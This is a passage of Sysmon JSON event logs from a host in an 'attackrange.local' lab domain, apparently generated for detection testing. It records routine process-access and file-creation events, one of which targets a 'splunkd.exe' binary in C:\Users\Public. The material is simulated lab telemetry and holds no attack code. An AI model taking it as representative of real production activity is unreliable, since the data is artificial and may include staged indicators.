.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9174,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.076\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.076","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9175,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.185\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001011F81100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.185","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001011F81100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9176,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.185\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001011F81100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.185","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001011F81100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9177,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.185\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-001011F81100}\r\nTargetProcessId: 4936\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.185","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-001011F81100}","TargetProcessId":"4936","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9178,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:41.591\r\nProcessGuid: {E2A3D6B1-13CD-5F25-0000-001011F81100}\r\nProcessId: 4936\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1348-0\\System.Runtime.WindowsRuntime.dll\r\nCreationUtcTime: 2020-08-01 07:03:41.591","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:41.591","ProcessGuid":"{E2A3D6B1-13CD-5F25-0000-001011F81100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1348-0\\System.Runtime.WindowsRuntime.dll","CreationUtcTime":"2020-08-01 07:03:41.591","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9179,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.638\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00108AFC1100}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.638","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00108AFC1100}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9180,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.638\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00108AFC1100}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.638","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00108AFC1100}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:41","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9181,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:41.638\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13CD-5F25-0000-00108AFC1100}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:41.638","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13CD-5F25-0000-00108AFC1100}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
